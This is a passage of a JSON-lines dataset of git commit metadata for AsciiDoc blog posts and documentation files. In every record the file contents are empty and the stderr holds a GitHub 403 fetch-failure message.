#157\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/ns-forms.adoc","new_file":"content\/guides\/ns-forms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"79bee2078049bae75399e8ccab0a60844af440af","subject":"Import the CCT Dev Book","message":"Import the CCT Dev Book\n","repos":"containers-tools\/cct,containers-tools\/cct","old_file":"docs\/devbook.adoc","new_file":"docs\/devbook.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/containers-tools\/cct.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58c71eda28b50fe87358f623446f2e87d3d2b97b","subject":"Update 2019-07-23-Probabilistic-Graphical-Models-Message-Passing-in-Cluster-Graphs.adoc","message":"Update 2019-07-23-Probabilistic-Graphical-Models-Message-Passing-in-Cluster-Graphs.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-07-23-Probabilistic-Graphical-Models-Message-Passing-in-Cluster-Graphs.adoc","new_file":"_posts\/2019-07-23-Probabilistic-Graphical-Models-Message-Passing-in-Cluster-Graphs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e6f3e5ad215982b70d75762f42d8fed8b9fd91","subject":"y2b create post Asus Transformer Prime + XBOX 360 Controller","message":"y2b create post Asus Transformer Prime + XBOX 360 Controller","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Asus-Transformer-Prime--XBOX-360-Controller.adoc","new_file":"_posts\/2012-01-12-Asus-Transformer-Prime--XBOX-360-Controller.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaa05da9eeb1e4c45a6999f75e97cf4e2c508c35","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd6ca33968106807396b7aec535124039fdc4d4c","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"123f5035bb03d7241f9f37e967f3086843b5fee1","subject":"Update 2015-08-18-Another-post-to-test.adoc","message":"Update 2015-08-18-Another-post-to-test.adoc","repos":"abhayghatpande\/hubpress.io,abhayghatpande\/hubpress.io,abhayghatpande\/hubpress.io","old_file":"_posts\/2015-08-18-Another-post-to-test.adoc","new_file":"_posts\/2015-08-18-Another-post-to-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abhayghatpande\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd80062135dd0fdf80a7a2fd41cfe8e68b4e53bb","subject":"Update 2015-10-13-the-birthday-of-2015.adoc","message":"Update 2015-10-13-the-birthday-of-2015.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-10-13-the-birthday-of-2015.adoc","new_file":"_posts\/2015-10-13-the-birthday-of-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbf957afb48765cbb9cce95c835039d9a39a509c","subject":"Update 2015-06-19-Grails-Internacionalizacao-em-banco-de-dados-e-arquivos.adoc","message":"Update 2015-06-19-Grails-Internacionalizacao-em-banco-de-dados-e-arquivos.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2015-06-19-Grails-Internacionalizacao-em-banco-de-dados-e-arquivos.adoc","new_file":"_posts\/2015-06-19-Grails-Internacionalizacao-em-banco-de-dados-e-arquivos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91ed3a266e9cd21f02340700a8d72d589f12bb3b","subject":"Renamed '_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc' to '_posts\/2020-02-04-test-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc'","message":"Renamed '_posts\/2020-02-04-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc' to '_posts\/2020-02-04-test-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc'","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-02-04-test-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_file":"_posts\/2020-02-04-test-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df7190113070390cb899e6845705f8f54787afd8","subject":"Update 2016-07-26-Dicas-de-seguranca-para-o-SSH-Introducao.adoc","message":"Update 2016-07-26-Dicas-de-seguranca-para-o-SSH-Introducao.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-26-Dicas-de-seguranca-para-o-SSH-Introducao.adoc","new_file":"_posts\/2016-07-26-Dicas-de-seguranca-para-o-SSH-Introducao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87d7f5e575ba8122e25c8e2fdbc35f3aa2f501c6","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7f3eb4b8d5eda244eb23e91df7ee18919809970","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"104fd82f87ea4833e60839d2aebd5ee248ee4304","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c7825b1f3af5e44ad3494b639d4f17b7c7a7b94","subject":"Update 2016-09-03-Title.adoc","message":"Update 2016-09-03-Title.adoc","repos":"bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io,bbsome\/bbsome.github.io","old_file":"_posts\/2016-09-03-Title.adoc","new_file":"_posts\/2016-09-03-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bbsome\/bbsome.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8df27b47dc65f4ecf92a2de5a602e51edff010c3","subject":"Update 2017-02-01-hello.adoc","message":"Update 2017-02-01-hello.adoc","repos":"introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io","old_file":"_posts\/2017-02-01-hello.adoc","new_file":"_posts\/2017-02-01-hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/introspectively\/introspectively.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ac2b27ed5b9f2213dc3f641178455d7719a5aed","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24348020ddc9a51a137b9508debfc5b85dabcee7","subject":"Update \t2014-07-03-forge-2.7.0.final.asciidoc","message":"Update \t2014-07-03-forge-2.7.0.final.asciidoc","repos":"forge\/docs,luiz158\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,addonis1990\/docs,agoncal\/docs","old_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"39174938fa02622516e9b376b4d9caf859952d6f","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba58b0f7c0a5f26849430f694cf002840eb9496f","subject":"Update 2016-08-10-Main-Street-Electrical-Parade-Returns-to-Disneyland.adoc","message":"Update 2016-08-10-Main-Street-Electrical-Parade-Returns-to-Disneyland.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-08-10-Main-Street-Electrical-Parade-Returns-to-Disneyland.adoc","new_file":"_posts\/2016-08-10-Main-Street-Electrical-Parade-Returns-to-Disneyland.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e724c07a05371e899a8571c46d0b78161dc562e","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"512d647b1202d39925f0c47598d2449cf4ffea54","subject":"Update 2019-03-28-Setting-Content-Type-for-multipartform-data-values.adoc","message":"Update 2019-03-28-Setting-Content-Type-for-multipartform-data-values.adoc","repos":"msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com,msavy\/rhymewithgravy.com","old_file":"_posts\/2019-03-28-Setting-Content-Type-for-multipartform-data-values.adoc","new_file":"_posts\/2019-03-28-Setting-Content-Type-for-multipartform-data-values.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/msavy\/rhymewithgravy.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5435f082c62cc6142af613668e1a7f3664a879a9","subject":"Adds minor comments on client feedback","message":"Adds minor comments on client feedback\n","repos":"cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp,cortizqgithub\/csoftz-rp","old_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/steps-fileupload.adoc","new_file":"ccma-quality-control\/Docs\/setup\/V3.6.0.0\/setup\/src\/docs\/asciidoc\/blocks\/steps-fileupload.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortizqgithub\/csoftz-rp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06521f25159ab737a4078cdf54175233561f1780","subject":"Update 2016-12-22-teste.adoc","message":"Update 2016-12-22-teste.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2016-12-22-teste.adoc","new_file":"_posts\/2016-12-22-teste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2dff13e5a7a72d605a2ce537d9b56d2989a2711","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47e14683ca92a06804da8cef00b73e18998f6c6a","subject":"Update 2019-02-26-I-T50.adoc","message":"Update 2019-02-26-I-T50.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-26-I-T50.adoc","new_file":"_posts\/2019-02-26-I-T50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e8a98f333dd9d817cde44f91718478050221a41","subject":"Update 2011-11-04-J-A-X-London-2011.adoc","message":"Update 2011-11-04-J-A-X-London-2011.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2011-11-04-J-A-X-London-2011.adoc","new_file":"_posts\/2011-11-04-J-A-X-London-2011.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77043628980d3e009b1ed956b350b617a1f78ad8","subject":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","message":"Update 2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_file":"_posts\/2017-06-19-I-may-tell-me-whether-it-is-a-Deja-vu-or-easy-oblivion-Chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb715c08478896601ce918ab201496dbdb21ec87","subject":"Update 2017-08-02-Fiddler-with-aspnet-core-and-configure-aspnet-core-as-a-reverse-proxy.adoc","message":"Update 2017-08-02-Fiddler-with-aspnet-core-and-configure-aspnet-core-as-a-reverse-proxy.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-08-02-Fiddler-with-aspnet-core-and-configure-aspnet-core-as-a-reverse-proxy.adoc","new_file":"_posts\/2017-08-02-Fiddler-with-aspnet-core-and-configure-aspnet-core-as-a-reverse-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b45dd251da8948148a333590d92456d1d33ec861","subject":"Very limited list of supported JSON-RPC methods","message":"Very limited list of supported JSON-RPC methods\n\nExpand it to cover the functionality of the current UI design.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fb58a7b5972e97ea673764e3cdce4fdcc648bde","subject":"Create 2015-06-15-forge-2.16.2.final.asciidoc","message":"Create 2015-06-15-forge-2.16.2.final.asciidoc","repos":"forge\/docs,luiz158\/docs,luiz158\/docs,forge\/docs","old_file":"news\/2015-06-15-forge-2.16.2.final.asciidoc","new_file":"news\/2015-06-15-forge-2.16.2.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"89bacc09136e27570c95edacbcc21ced0e8c2db9","subject":"Update 2017-07-10-How-To-Use-third-party-libraries-in-Jenkins-Pipeline.adoc","message":"Update 2017-07-10-How-To-Use-third-party-libraries-in-Jenkins-Pipeline.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2017-07-10-How-To-Use-third-party-libraries-in-Jenkins-Pipeline.adoc","new_file":"_posts\/2017-07-10-How-To-Use-third-party-libraries-in-Jenkins-Pipeline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59cf547971e932d24a8582f22a257874a2918913","subject":"faq: initial import","message":"faq: initial import\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/faq.adoc","new_file":"userguide\/tutorials\/faq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e762e9e213b39647fc0836e9ad565203060e4ad","subject":"Update 2015-08-13-Hola-Hubpress.adoc","message":"Update 2015-08-13-Hola-Hubpress.adoc","repos":"Rackcore\/Rackcore.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,AlonsoCampos\/AlonsoCampos.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Rackcore\/Rackcore.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-08-13-Hola-Hubpress.adoc","new_file":"_posts\/2015-08-13-Hola-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae8053245ca60b89c36fad6154129f05e93b157a","subject":"Update 2018-07-11-The-confusing-Bash-configuration-files.adoc","message":"Update 2018-07-11-The-confusing-Bash-configuration-files.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2018-07-11-The-confusing-Bash-configuration-files.adoc","new_file":"_posts\/2018-07-11-The-confusing-Bash-configuration-files.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4626b0b72b5c7c6d6343e5c712eec121c67ce84","subject":"Update 2015-05-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","message":"Update 2015-05-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-05-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_file":"_posts\/2015-05-22-FAILED-Package-Messages-when-Using-Fedora-fedup-System-Upgrade-Tool.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a79fd79350a54af22d9e2f9a6ca7f1b41babdd7f","subject":"Release announcement for services 0.37 (#314)","message":"Release announcement for services 0.37 (#314)\n\n* Release announcement for services 0.37\r\n\r\n* Metrics version is 0.26.1\r\n\r\n* Fix typo\r\n","repos":"lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/05\/03\/hawkular-services-0.37-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/05\/03\/hawkular-services-0.37-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"24cfcf40d779ec367ba9a6d187a876d2164d7df4","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44adf63bb2fa418a5868d9e1e8be465ef522fdf3","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36a9eeb372191e3881fe3065f448e0e48eab5ad2","subject":"Removed redundant mention of AE in EE intro page","message":"Removed redundant mention of AE in EE intro page\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/ee\/introduction.adoc","new_file":"pages\/ee\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de7b242e97cabeac87e7097a1e4c763d9d8fa058","subject":"Update 2018-05-27-G-A-S.adoc","message":"Update 2018-05-27-G-A-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-27-G-A-S.adoc","new_file":"_posts\/2018-05-27-G-A-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c61c6b961c502ce7c09f37f2536a437f2b0d1c4","subject":"Update 2018-10-05-E-K-S.adoc","message":"Update 2018-10-05-E-K-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-05-E-K-S.adoc","new_file":"_posts\/2018-10-05-E-K-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 